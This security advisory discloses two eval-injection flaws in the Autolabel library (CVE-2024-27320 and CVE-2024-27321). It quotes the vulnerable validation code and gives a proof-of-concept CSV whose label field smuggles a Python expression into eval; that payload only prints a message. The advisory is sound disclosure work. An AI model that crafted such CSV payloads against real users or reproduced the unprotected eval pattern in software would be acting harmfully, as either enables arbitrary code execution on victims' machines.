Autolabel
Vulnerability Report

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

CVE Number

CVE-2024-27320

Summary

An arbitrary code execution vulnerability exists inside the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. The vulnerability requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. The vulnerability allows an attacker to run arbitrary Python code on the machine the CSV file is loaded on because of the use of an unprotected eval function.

Products Impacted

This vulnerability is present in Autolabel v0.0.8 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)

Details

To exploit this vulnerability, an attacker would create a malicious CSV file and share this as a dataset with the victim, who would load it for a classification task using AutoLabel. The vulnerability exists in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file (shown below).

    <span class="token keyword">def</span> <span class="token function">validate</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span> value<span class="token punctuation">:</span> str<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token triple-quoted-string string">"""Validate classification

        A classification label(ground_truth) could either be a list or string
        """</span>
        <span class="token comment"># TODO: This can be made better</span>
        <span class="token keyword">if</span> value<span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"["</span><span class="token punctuation">)</span> <span class="token operator">and</span> value<span class="token punctuation">.</span>endswith<span class="token punctuation">(</span><span class="token string">"]"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            <span class="token keyword">try</span><span class="token punctuation">:</span>
                seed_labels <span class="token operator">=</span> eval<span class="token punctuation">(</span>value<span class="token punctuation">)</span>
                <span class="token keyword">if</span> <span class="token operator">not</span> isinstance<span class="token punctuation">(</span>seed_labels<span class="token punctuation">,</span> list<span class="token punctuation">)</span><span class="token punctuation">:</span>
                    <span class="token keyword">raise</span>
                unmatched_label <span class="token operator">=</span> set<span class="token punctuation">(</span>seed_labels<span class="token punctuation">)</span> <span class="token operator">-</span> self<span class="token punctuation">.</span>labels_set
                <span class="token keyword">if</span> len<span class="token punctuation">(</span>unmatched_label<span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">0</span><span class="token punctuation">:</span>
                    <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span>
                        f<span class="token string">"labels: '{unmatched_label}' not in prompt/labels provided in config "</span>
                    <span class="token punctuation">)</span>
            <span class="token keyword">except</span> SyntaxError<span class="token punctuation">:</span>
                <span class="token keyword">raise</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> value <span class="token operator">not</span> <span class="token keyword">in</span> self<span class="token punctuation">.</span>labels_set<span class="token punctuation">:</span>
                <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span>
                    f<span class="token string">"labels: '{value}' not in prompt/labels provided in config "</span>
                <span class="token punctuation">)</span>
Python

When the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class set with the task_type attribute. If the arguments are wrapped in brackets “[]”, they are passed into an eval function in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py fileThis allows arbitrary code execution on the victim’s device. An example of a configuration and an example of a malicious CSV are shown below.

<span class="token keyword">from</span> autolabel <span class="token keyword">import</span> AutolabelDataset

config <span class="token operator">=</span> <span class="token punctuation">{</span>
    <span class="token string">"task_name"</span><span class="token punctuation">:</span> <span class="token string">"ToxicCommentClassification"</span><span class="token punctuation">,</span>
    <span class="token string">"task_type"</span><span class="token punctuation">:</span> <span class="token string">"classification"</span><span class="token punctuation">,</span> <span class="token comment"># classification task</span>
    <span class="token string">"dataset"</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
        <span class="token string">"label_column"</span><span class="token punctuation">:</span> <span class="token string">"label"</span><span class="token punctuation">,</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token string">"model"</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
        <span class="token string">"provider"</span><span class="token punctuation">:</span> <span class="token string">"openai"</span><span class="token punctuation">,</span>
        <span class="token string">"name"</span><span class="token punctuation">:</span> <span class="token string">"gpt-3.5-turbo"</span> <span class="token comment"># the model we want to use</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token string">"prompt"</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
        <span class="token comment"># very simple instructions for the LLM</span>
        <span class="token string">"task_guidelines"</span><span class="token punctuation">:</span> <span class="token string">"Does the provided comment contain 'toxic' language? Say toxic or not toxic."</span><span class="token punctuation">,</span>
        <span class="token string">"labels"</span><span class="token punctuation">:</span> <span class="token punctuation">[</span> <span class="token comment"># list of labels to choose from</span>
            <span class="token string">"label"</span><span class="token punctuation">,</span>
            <span class="token string">"not toxic"</span>
        <span class="token punctuation">]</span><span class="token punctuation">,</span>
        <span class="token string">"example_template"</span><span class="token punctuation">:</span> <span class="token string">"Text Snippet: {example}\nClassification: {label}\n{label}"</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

AutolabelDataset<span class="token punctuation">(</span><span class="token string">'example.csv'</span><span class="token punctuation">,</span> config<span class="token punctuation">,</span> validate<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>
Python

example_config.py

example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]
Unset

example.csv

Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class

CVE Number

CVE-2024-27321

Summary

An arbitrary code execution vulnerability exists inside the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file. The vulnerability requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. The vulnerability allows an attacker to run arbitrary Python code on the program’s machine because of the use of an unprotected eval function.

Products Impacted

This vulnerability is present in Autolabel v0.0.8 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)

Details

To exploit this vulnerability, an attacker would create a malicious CSV file and share the dataset with the victim to load it for a multilabel classification task using Autolabel. The vulnerability exists in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file.

    <span class="token keyword">def</span> <span class="token function">validate</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span> value<span class="token punctuation">:</span> str<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span> value<span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"["</span><span class="token punctuation">)</span> <span class="token operator">and</span> value<span class="token punctuation">.</span>endswith<span class="token punctuation">(</span><span class="token string">"]"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            <span class="token keyword">try</span><span class="token punctuation">:</span>
                seed_labels <span class="token operator">=</span> eval<span class="token punctuation">(</span>value<span class="token punctuation">)</span>
                <span class="token keyword">if</span> <span class="token operator">not</span> isinstance<span class="token punctuation">(</span>seed_labels<span class="token punctuation">,</span> list<span class="token punctuation">)</span><span class="token punctuation">:</span>
                    <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span>
                        f<span class="token string">"value: '{value}' is not a list of labels as expected"</span>
                    <span class="token punctuation">)</span>
                unmatched_label <span class="token operator">=</span> set<span class="token punctuation">(</span>seed_labels<span class="token punctuation">)</span> <span class="token operator">-</span> self<span class="token punctuation">.</span>labels_set
                <span class="token keyword">if</span> len<span class="token punctuation">(</span>unmatched_label<span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">0</span><span class="token punctuation">:</span>
                    <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span>
                        f<span class="token string">"labels: '{unmatched_label}' not in prompt/labels provided in config "</span>
                    <span class="token punctuation">)</span>
            <span class="token keyword">except</span> SyntaxError<span class="token punctuation">:</span>
                <span class="token keyword">raise</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token comment"># TODO: split by delimiter specified in config and validate each label</span>
            <span class="token keyword">pass</span>
Python

When the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class set with the task_type attribute. If the arguments are wrapped in brackets “[]”, they are passed into an eval function in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py fileThis allows arbitrary code execution on the victim’s device. An example configuration and an example of a malicious CSV are shown below:



<span class="token keyword">from</span> autolabel <span class="token keyword">import</span> AutolabelDataset

config <span class="token operator">=</span> <span class="token punctuation">{</span>
    <span class="token string">"task_name"</span><span class="token punctuation">:</span> <span class="token string">"ToxicCommentClassification"</span><span class="token punctuation">,</span>
    <span class="token string">"task_type"</span><span class="token punctuation">:</span> <span class="token string">"multilabel_classification"</span><span class="token punctuation">,</span> <span class="token comment"># classification task</span>
    <span class="token string">"dataset"</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
        <span class="token string">"label_column"</span><span class="token punctuation">:</span> <span class="token string">"label"</span><span class="token punctuation">,</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token string">"model"</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
        <span class="token string">"provider"</span><span class="token punctuation">:</span> <span class="token string">"openai"</span><span class="token punctuation">,</span>
        <span class="token string">"name"</span><span class="token punctuation">:</span> <span class="token string">"gpt-3.5-turbo"</span> <span class="token comment"># the model we want to use</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token string">"prompt"</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
        <span class="token comment"># very simple instructions for the LLM</span>
        <span class="token string">"task_guidelines"</span><span class="token punctuation">:</span> <span class="token string">"Does the provided comment contain 'toxic' language? Say toxic or not toxic."</span><span class="token punctuation">,</span>
        <span class="token string">"labels"</span><span class="token punctuation">:</span> <span class="token punctuation">[</span> <span class="token comment"># list of labels to choose from</span>
            <span class="token string">"label"</span><span class="token punctuation">,</span>
            <span class="token string">"not toxic"</span>
        <span class="token punctuation">]</span><span class="token punctuation">,</span>
        <span class="token string">"example_template"</span><span class="token punctuation">:</span> <span class="token string">"Text Snippet: {example}\nClassification: {label}\n{label}"</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

AutolabelDataset<span class="token punctuation">(</span><span class="token string">'example.csv'</span><span class="token punctuation">,</span> config<span class="token punctuation">,</span> validate<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>
Python

example_config.py



example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]
Unset

example.csv

Timeline

July, 8 2024 — Reached out to multiple administrators through their communication channel

September, 6 2024 — Final attempt to reach out to vendor prior to public disclosure date

September, 12 2024 — Public disclosure

Researcher: Leo Ring, Security Research Intern, HiddenLayer
Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer